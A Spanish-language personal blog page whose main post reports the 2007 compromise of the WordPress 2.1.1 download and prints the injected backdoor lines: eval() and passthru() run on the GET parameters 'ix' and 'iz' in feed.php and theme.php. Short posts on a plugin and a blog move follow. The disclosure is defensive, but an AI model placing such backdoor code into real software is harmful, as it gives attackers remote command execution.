P0L0's Blog Opensource Projects and IT experiences

4Mar/070

WordPress 2.1.1 Comprometido

Hace unos dias alguien ha entrado en la maquina de descargas de worpress y se han cambiado dos ficheros en wp-include en los cuales han metido codigo para ejecutar codigo por medio de parametro GET. Tal como dicen en la web de wordpress hay que actualizar inmeditamente a la version 2.1.2

El codigo injectado esta en estos dos ficheros:

  • wp-includes/feed.php
    84
    85
    86
    
    function comment_text_phpfilter($filterdata) {
        eval($filterdata);
    }
    149
    
    if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
  • wp-includes/theme.php
    408
    409
    410
    
    function get_theme_mcommand($mcds) {
      passthru($mcds);
    }
    441
    
    if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
5Oct/060

WordPress Post Update Plugin

He echo un pequeño plugin para poner al final del post un texto de que ha sido actualizado el post. Es algo que siempre se me olvida de poner en los posts y que suele quedar bien para saber que ha habido modificaciones. Esta es la primera version de todas que lo unico que hace es añadir un texto "Updated: fecha" y se puede definir los estilos usando la clase "post_updated". Segun vaya teniendo tiempo ya le ire añadiendo nuevas funcionalidades.

Podeis descargarlo aqui Post Updated v.0.1a

7Mar/060

Nos mudamos!

Bueno... despues de un año mas o menos aqui en blogger, mudo el blog a Binware Hosting, que esto de no poder hacer backups no me convence... asi que apartir de ahora el blog estara disponible en el nuevo P0L0's Blog